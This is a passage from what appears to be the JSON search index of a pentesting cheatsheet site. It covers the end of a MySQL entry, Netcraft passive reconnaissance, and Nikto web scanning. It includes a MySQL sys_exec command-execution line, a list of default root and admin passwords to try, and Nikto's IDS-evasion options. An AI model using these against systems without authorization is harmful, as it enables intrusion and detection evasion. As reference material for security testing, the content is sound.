sys_exec(\u003cspan style=\"color:#e6db74\"\u003e\u0026#39;id \u0026gt; /tmp/out\u0026#39;\u003c/span\u003e);\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"common-credentials-to-try\"\u003eCommon Credentials to Try\u003c/h2\u003e\n\u003cpre tabindex=\"0\"\u003e\u003ccode\u003eroot : (blank)\nroot : root\nroot : password\nroot : mysql\nroot : toor\nadmin : admin\n\u003c/code\u003e\u003c/pre\u003e","title":"MySQL"},{"content":"Netcraft Cheatsheet Purpose: Passive reconnaissance — hosting history, OS / web server history, SSL certificate history, site report, and subdomain discovery for a target domain. Uses Netcraft\u0026rsquo;s long-running internet survey, so no traffic touches the target.\nFormat: Web service. Free site-report lookups; subdomain search; commercial APIs for bulk.\nAccess Points Surface URL Site Report (single site) https://sitereport.netcraft.com/?url= Subdomain / Domain search https://searchdns.netcraft.com/ What\u0026rsquo;s that site running? (legacy) https://toolbar.netcraft.com/site_report?url= Phishing / takedown reporting https://report.netcraft.com/ Anti-phishing browser extension https://www.netcraft.com/apps/ Quick Lookups (URL-style) # Site Report xdg-open \u0026#34;https://sitereport.netcraft.com/?url=https://target.tld\u0026#34; # Subdomain search (DNS knowledge, not zone transfer) xdg-open \u0026#34;https://searchdns.netcraft.com/?host=*.target.tld\u0026#34; # Scrape subdomain list (HTML — fragile, format may change) curl -s -A \u0026#34;Mozilla/5.0\u0026#34; \\ \u0026#34;https://searchdns.netcraft.com/?restriction=site+ends+with\u0026amp;host=target.tld\u0026#34; \\ | grep -oE \u0026#39;[a-zA-Z0-9.-]+\\.target\\.tld\u0026#39; | sort -u What the Site Report Reveals Background: site title, description, language, first-seen date Network: IPv4/IPv6, ASN, netblock owner, hosting country, nameservers, reverse DNS Hosting history: OS, web server, hosting provider, IP changes over time (often years) SSL/TLS: certificate issuer, valid-from / valid-to, signature alg, key size, full chain Web trackers: analytics, ad networks, tag managers Site technologies: server-side language, CMS, JS frameworks (similar surface to Wappalyzer/WhatWeb but historical) Risk rating: Netcraft\u0026rsquo;s own risk scoring (popularity, reputation, phishing flags) OSINT Pivots Hosting history → identify legacy IPs that may still serve content (origin behind CDN, forgotten staging). SSL history → past CN / SAN entries leak retired subdomains and internal hostnames. Same nameservers + hosting across multiple sites → infrastructure attribution. First-seen date → useful for triaging suspicious / typosquat domains. Subdomain Discovery https://searchdns.netcraft.com/?host=*.target.tld Returns publicly known hosts under a domain. Complement, do not replace, [[crt.sh]] / amass / subfinder — Netcraft sees long-tail hosts those miss, and vice versa. Free tier paginates and rate-limits aggressively; expect a CAPTCHA on bulk. Workflow Example DOMAIN=target.tld # 1. Open Site Report xdg-open \u0026#34;https://sitereport.netcraft.com/?url=https://$DOMAIN\u0026#34; # 2. Pull subdomain list (best-effort scrape) curl -s -A \u0026#34;Mozilla/5.0\u0026#34; \\ \u0026#34;https://searchdns.netcraft.com/?restriction=site+ends+with\u0026amp;host=$DOMAIN\u0026#34; \\ | grep -oE \u0026#34;[a-zA-Z0-9.-]+\\.$DOMAIN\u0026#34; | sort -u \u0026gt; netcraft-subs.txt # 3. Cross-check with crt.sh curl -s \u0026#34;https://crt.sh/?q=%25.$DOMAIN\u0026amp;output=json\u0026#34; \\ | jq -r \u0026#39;.[].name_value\u0026#39; | tr \u0026#39;,\u0026#39; \u0026#39; \u0026#39; | sort -u \u0026gt; crtsh-subs.txt # 4. Merge sort -u netcraft-subs.txt crtsh-subs.txt \u0026gt; all-subs.txt Browser Extension Netcraft\u0026rsquo;s anti-phishing extension shows live Site Report data inline:\nSite rank, hosting country, ASN owner Risk rating + phishing flag status One-click jump to full Site Report Useful during engagement scoping to confirm asset ownership without sending packets.\nTips Fully passive — target sees nothing. Hosting/OS history is Netcraft\u0026rsquo;s killer feature; nothing else has the same time depth. Site Report\u0026rsquo;s \u0026ldquo;Hosting history\u0026rdquo; can date origin migrations — handy for finding pre-CDN IPs. Subdomain search is incomplete on its own; pair with CT logs and bruteforce. Free use is rate-limited; for bulk/automation, look at Netcraft\u0026rsquo;s commercial Threat Intelligence APIs. Related [[builtwith]] — historical tech stack overlap (less infra, more app-layer). [[wappalyzer]] — current tech only, browser-side. [[whatweb]] — active CLI fingerprinting if you need ground truth. [[wafw00f]] — pair Site Report (hosting) with WAF fingerprint for full edge picture. ","permalink":"https://d3vilsec.com/cheatsheets/pentesting/information-gathering-web-edition/fingerprinting/netcraft/","summary":"\u003ch1 id=\"netcraft-cheatsheet\"\u003eNetcraft Cheatsheet\u003c/h1\u003e\n\u003cp\u003e\u003cstrong\u003ePurpose:\u003c/strong\u003e Passive reconnaissance — hosting history, OS / web server history, SSL certificate history, site report, and subdomain discovery for a target domain. Uses Netcraft\u0026rsquo;s long-running internet survey, so no traffic touches the target.\u003c/p\u003e\n\u003cp\u003e\u003cstrong\u003eFormat:\u003c/strong\u003e Web service. Free site-report lookups; subdomain search; commercial APIs for bulk.\u003c/p\u003e\n\u003chr\u003e\n\u003ch2 id=\"access-points\"\u003eAccess Points\u003c/h2\u003e\n\u003ctable\u003e\n\t\u003cthead\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003cth\u003eSurface\u003c/th\u003e\n\t\t\t\t\t\u003cth\u003eURL\u003c/th\u003e\n\t\t\t\u003c/tr\u003e\n\t\u003c/thead\u003e\n\t\u003ctbody\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003eSite Report (single site)\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ca href=\"https://sitereport.netcraft.com/?url=\"\u003ehttps://sitereport.netcraft.com/?url=\u003c/a\u003e\u003c!-- raw HTML omitted --\u003e\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003eSubdomain / Domain search\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ca href=\"https://searchdns.netcraft.com/\"\u003ehttps://searchdns.netcraft.com/\u003c/a\u003e\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003eWhat\u0026rsquo;s that site running? (legacy)\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ca href=\"https://toolbar.netcraft.com/site_report?url=\"\u003ehttps://toolbar.netcraft.com/site_report?url=\u003c/a\u003e\u003c!-- raw HTML omitted --\u003e\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003ePhishing / takedown reporting\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ca href=\"https://report.netcraft.com/\"\u003ehttps://report.netcraft.com/\u003c/a\u003e\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003eAnti-phishing browser extension\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ca href=\"https://www.netcraft.com/apps/\"\u003ehttps://www.netcraft.com/apps/\u003c/a\u003e\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\u003c/tbody\u003e\n\u003c/table\u003e\n\u003chr\u003e\n\u003ch2 id=\"quick-lookups-url-style\"\u003eQuick Lookups (URL-style)\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Site Report\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003exdg-open \u003cspan style=\"color:#e6db74\"\u003e\u0026#34;https://sitereport.netcraft.com/?url=https://target.tld\u0026#34;\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Subdomain search (DNS knowledge, not zone transfer)\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003exdg-open \u003cspan style=\"color:#e6db74\"\u003e\u0026#34;https://searchdns.netcraft.com/?host=*.target.tld\u0026#34;\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Scrape subdomain list (HTML — fragile, format may change)\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ecurl -s -A \u003cspan style=\"color:#e6db74\"\u003e\u0026#34;Mozilla/5.0\u0026#34;\u003c/span\u003e \u003cspan style=\"color:#ae81ff\"\u003e\\\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u003cspan style=\"color:#e6db74\"\u003e\u0026#34;https://searchdns.netcraft.com/?restriction=site+ends+with\u0026amp;host=target.tld\u0026#34;\u003c/span\u003e \u003cspan style=\"color:#ae81ff\"\u003e\\\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e | grep -oE \u003cspan style=\"color:#e6db74\"\u003e\u0026#39;[a-zA-Z0-9.-]+\\.target\\.tld\u0026#39;\u003c/span\u003e | sort -u\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"what-the-site-report-reveals\"\u003eWhat the Site Report Reveals\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eBackground:\u003c/strong\u003e site title, description, language, first-seen date\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eNetwork:\u003c/strong\u003e IPv4/IPv6, ASN, netblock owner, hosting country, nameservers, reverse DNS\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eHosting history:\u003c/strong\u003e OS, web server, hosting provider, IP changes over time (often years)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eSSL/TLS:\u003c/strong\u003e certificate issuer, valid-from / valid-to, signature alg, key size, full chain\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eWeb trackers:\u003c/strong\u003e analytics, ad networks, tag managers\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eSite technologies:\u003c/strong\u003e server-side language, CMS, JS frameworks (similar surface to Wappalyzer/WhatWeb but historical)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eRisk rating:\u003c/strong\u003e Netcraft\u0026rsquo;s own risk scoring (popularity, reputation, phishing flags)\u003c/li\u003e\n\u003c/ul\u003e\n\u003chr\u003e\n\u003ch2 id=\"osint-pivots\"\u003eOSINT Pivots\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eHosting history\u003c/strong\u003e → identify legacy IPs that may still serve content (origin behind CDN, forgotten staging).\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eSSL history\u003c/strong\u003e → past CN / SAN entries leak retired subdomains and internal hostnames.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eSame nameservers + hosting\u003c/strong\u003e across multiple sites → infrastructure attribution.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eFirst-seen date\u003c/strong\u003e → useful for triaging suspicious / typosquat domains.\u003c/li\u003e\n\u003c/ul\u003e\n\u003chr\u003e\n\u003ch2 id=\"subdomain-discovery\"\u003eSubdomain Discovery\u003c/h2\u003e\n\u003cpre tabindex=\"0\"\u003e\u003ccode\u003ehttps://searchdns.netcraft.com/?host=*.target.tld\n\u003c/code\u003e\u003c/pre\u003e\u003cul\u003e\n\u003cli\u003eReturns publicly known hosts under a domain.\u003c/li\u003e\n\u003cli\u003eComplement, do not replace, [[crt.sh]] / \u003ccode\u003eamass\u003c/code\u003e / \u003ccode\u003esubfinder\u003c/code\u003e — Netcraft sees long-tail hosts those miss, and vice versa.\u003c/li\u003e\n\u003cli\u003eFree tier paginates and rate-limits aggressively; expect a CAPTCHA on bulk.\u003c/li\u003e\n\u003c/ul\u003e\n\u003chr\u003e\n\u003ch2 id=\"workflow-example\"\u003eWorkflow Example\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eDOMAIN\u003cspan style=\"color:#f92672\"\u003e=\u003c/span\u003etarget.tld\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# 1. Open Site Report\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003exdg-open \u003cspan style=\"color:#e6db74\"\u003e\u0026#34;https://sitereport.netcraft.com/?url=https://\u003c/span\u003e$DOMAIN\u003cspan style=\"color:#e6db74\"\u003e\u0026#34;\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# 2. Pull subdomain list (best-effort scrape)\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ecurl -s -A \u003cspan style=\"color:#e6db74\"\u003e\u0026#34;Mozilla/5.0\u0026#34;\u003c/span\u003e \u003cspan style=\"color:#ae81ff\"\u003e\\\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u003cspan style=\"color:#e6db74\"\u003e\u0026#34;https://searchdns.netcraft.com/?restriction=site+ends+with\u0026amp;host=\u003c/span\u003e$DOMAIN\u003cspan style=\"color:#e6db74\"\u003e\u0026#34;\u003c/span\u003e \u003cspan style=\"color:#ae81ff\"\u003e\\\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e | grep -oE \u003cspan style=\"color:#e6db74\"\u003e\u0026#34;[a-zA-Z0-9.-]+\\.\u003c/span\u003e$DOMAIN\u003cspan style=\"color:#e6db74\"\u003e\u0026#34;\u003c/span\u003e | sort -u \u0026gt; netcraft-subs.txt\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# 3. Cross-check with crt.sh\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ecurl -s \u003cspan style=\"color:#e6db74\"\u003e\u0026#34;https://crt.sh/?q=%25.\u003c/span\u003e$DOMAIN\u003cspan style=\"color:#e6db74\"\u003e\u0026amp;output=json\u0026#34;\u003c/span\u003e \u003cspan style=\"color:#ae81ff\"\u003e\\\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e | jq -r \u003cspan style=\"color:#e6db74\"\u003e\u0026#39;.[].name_value\u0026#39;\u003c/span\u003e | tr \u003cspan style=\"color:#e6db74\"\u003e\u0026#39;,\u0026#39;\u003c/span\u003e \u003cspan style=\"color:#e6db74\"\u003e\u0026#39;\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#e6db74\"\u003e\u0026#39;\u003c/span\u003e | sort -u \u0026gt; crtsh-subs.txt\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# 4. Merge\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003esort -u netcraft-subs.txt crtsh-subs.txt \u0026gt; all-subs.txt\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"browser-extension\"\u003eBrowser Extension\u003c/h2\u003e\n\u003cp\u003eNetcraft\u0026rsquo;s anti-phishing extension shows live Site Report data inline:\u003c/p\u003e","title":"netcraft"},{"content":"Nikto Cheatsheet Purpose: Web server scanner — checks for dangerous files, outdated server software, misconfigurations, and known vulnerabilities.\nBasic Usage nikto -h \u0026lt;target\u0026gt; # Scan a target (default port 80) nikto -h https://target.tld # HTTPS target nikto -h \u0026lt;ip\u0026gt; -p 443 -ssl # Force SSL on custom port nikto -h \u0026lt;ip\u0026gt; -p 80,443,8080,8443 # Multiple ports nikto -h hosts.txt # Scan a list of targets Common Flags Flag Description -h \u0026lt;host\u0026gt; Target host, URL, or file of hosts -p \u0026lt;ports\u0026gt; Port(s) — single, list, or range -ssl Force SSL/TLS -nossl Disable SSL -root \u0026lt;path\u0026gt; Prepend root path to all requests -vhost \u0026lt;host\u0026gt; Set virtual host (Host header) -id \u0026lt;user:pass\u0026gt; HTTP Basic auth -useragent \u0026lt;ua\u0026gt; Custom User-Agent -useproxy \u0026lt;url\u0026gt; Route through proxy -Display \u0026lt;opts\u0026gt; Output verbosity flags (see below) -Format \u0026lt;fmt\u0026gt; Output format: csv, htm, txt, xml, json, sql -output \u0026lt;file\u0026gt; Write report to file -Tuning \u0026lt;ids\u0026gt; Limit checks to specific categories -Plugins \u0026lt;list\u0026gt; Run specific plugins only -evasion \u0026lt;ids\u0026gt; IDS evasion techniques -timeout \u0026lt;s\u0026gt; Per-request timeout -maxtime \u0026lt;s/m/h\u0026gt; Hard scan time limit (e.g. 30m) -Pause \u0026lt;s\u0026gt; Pause between requests -ask no Don\u0026rsquo;t prompt to submit findings -update Update plugins / databases -list-plugins List installed plugins Output nikto -h https://target.tld -o report.html -Format htm nikto -h \u0026lt;ip\u0026gt; -o nikto.json -Format json nikto -h \u0026lt;ip\u0026gt; -o nikto.xml -Format xml nikto -h \u0026lt;ip\u0026gt; -o nikto.csv -Format csv -Display flags (combine, e.g. -Display 1V):\nID Meaning 1 Show redirects 2 Show cookies received 3 Show 200/OK responses 4 Show URLs requiring auth D Debug output E HTTP errors P Show progress S Scrub IPs from output V Verbose Tuning (Limit Check Categories) nikto -h \u0026lt;target\u0026gt; -Tuning \u0026lt;ids\u0026gt; ID Category 0 File upload 1 Interesting files / logs 2 Misconfiguration / default files 3 Information disclosure 4 Injection (XSS/HTML) 5 Remote file retrieval — inside webroot 6 Denial of Service 7 Remote file retrieval — server-wide 8 Command execution / RCE 9 SQL injection a Auth bypass b Software identification c Remote source inclusion d WebService e Administrative console x Reverse tuning (exclude listed) Examples:\nnikto -h \u0026lt;target\u0026gt; -Tuning 123b # Files, misconfig, info, fingerprint nikto -h \u0026lt;target\u0026gt; -Tuning x6 # Everything EXCEPT DoS nikto -h \u0026lt;target\u0026gt; -Tuning 9a # SQLi + auth bypass only Evasion Techniques (-evasion) ID Technique 1 Random URI encoding (non-UTF8) 2 Directory self-reference (/./) 3 Premature URL ending 4 Prepend long random string 5 Fake parameter 6 TAB as request spacer 7 Change case of URL 8 Use Windows directory separator \\ A Use carriage return (0x0d) as line terminator B Use binary value 0x0b as spacer nikto -h \u0026lt;target\u0026gt; -evasion 1234 Auth, Headers, vhost, Proxy # HTTP Basic nikto -h https://target.tld -id \u0026#39;admin:password\u0026#39; # Custom UA + custom Host (vhost test) nikto -h \u0026lt;ip\u0026gt; -vhost dev.target.tld -useragent \u0026#34;Mozilla/5.0 Recon/1.0\u0026#34; # Cookie-based session nikto -h https://target.tld -Header \u0026#34;Cookie: session=abcd1234\u0026#34; # Through Burp / ZAP nikto -h https://target.tld -useproxy http://127.0.0.1:8080 Proxy can also be set in nikto.conf:\nPROXYHOST=127.0.0.1 PROXYPORT=8080 Practical Recipes # Quick fingerprint + misconfig sweep, no DoS, no SQLi noise nikto -h https://target.tld -Tuning 123b -maxtime 15m -o fp.html -Format htm # Full scan against an internal app behind a non-default path nikto -h http://\u0026lt;ip\u0026gt; -p 8080 -root /app/ -o app-scan.txt # Bulk scan from a list, JSON output, throttled nikto -h targets.txt -Pause 1 -o bulk.json -Format json -ask no # SSL scan with verbose progress nikto -h target.tld -p 443 -ssl -Display PV Tips Nikto is loud — assume IDS/WAF will flag it. Use -Pause, -Tuning, and -evasion if stealth matters. Run after whatweb / wafw00f so tuning matches the detected stack. Many findings are informational; verify hits manually with curl before claiming a vuln. Use -update after install and periodically — checks are plugin-driven. For HTTPS targets that redirect from HTTP, scan both ports explicitly — Nikto won\u0026rsquo;t always follow. ","permalink":"https://d3vilsec.com/cheatsheets/pentesting/information-gathering-web-edition/fingerprinting/nikto/","summary":"\u003ch1 id=\"nikto-cheatsheet\"\u003eNikto Cheatsheet\u003c/h1\u003e\n\u003cp\u003e\u003cstrong\u003ePurpose:\u003c/strong\u003e Web server scanner — checks for dangerous files, outdated server software, misconfigurations, and known vulnerabilities.\u003c/p\u003e\n\u003chr\u003e\n\u003ch2 id=\"basic-usage\"\u003eBasic Usage\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enikto -h \u0026lt;target\u0026gt; \u003cspan style=\"color:#75715e\"\u003e# Scan a target (default port 80)\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enikto -h https://target.tld \u003cspan style=\"color:#75715e\"\u003e# HTTPS target\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enikto -h \u0026lt;ip\u0026gt; -p \u003cspan style=\"color:#ae81ff\"\u003e443\u003c/span\u003e -ssl \u003cspan style=\"color:#75715e\"\u003e# Force SSL on custom port\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enikto -h \u0026lt;ip\u0026gt; -p 80,443,8080,8443 \u003cspan style=\"color:#75715e\"\u003e# Multiple ports\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enikto -h hosts.txt \u003cspan style=\"color:#75715e\"\u003e# Scan a list of targets\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"common-flags\"\u003eCommon Flags\u003c/h2\u003e\n\u003ctable\u003e\n\t\u003cthead\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003cth\u003eFlag\u003c/th\u003e\n\t\t\t\t\t\u003cth\u003eDescription\u003c/th\u003e\n\t\t\t\u003c/tr\u003e\n\t\u003c/thead\u003e\n\t\u003ctbody\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-h \u0026lt;host\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eTarget host, URL, or file of hosts\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-p \u0026lt;ports\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003ePort(s) — single, list, or range\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-ssl\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eForce SSL/TLS\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-nossl\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eDisable SSL\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-root \u0026lt;path\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003ePrepend root path to all requests\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-vhost \u0026lt;host\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eSet virtual host (Host header)\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-id \u0026lt;user:pass\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eHTTP Basic auth\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-useragent \u0026lt;ua\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eCustom User-Agent\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-useproxy \u0026lt;url\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eRoute through proxy\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-Display \u0026lt;opts\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eOutput verbosity flags (see below)\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-Format \u0026lt;fmt\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eOutput format: \u003ccode\u003ecsv\u003c/code\u003e, \u003ccode\u003ehtm\u003c/code\u003e, \u003ccode\u003etxt\u003c/code\u003e, \u003ccode\u003exml\u003c/code\u003e, \u003ccode\u003ejson\u003c/code\u003e, \u003ccode\u003esql\u003c/code\u003e\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-output \u0026lt;file\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eWrite report to file\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-Tuning \u0026lt;ids\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eLimit checks to specific categories\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-Plugins \u0026lt;list\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eRun specific plugins only\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-evasion \u0026lt;ids\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eIDS evasion techniques\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-timeout \u0026lt;s\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003ePer-request timeout\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-maxtime \u0026lt;s/m/h\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eHard scan time limit (e.g. \u003ccode\u003e30m\u003c/code\u003e)\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-Pause \u0026lt;s\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003ePause between 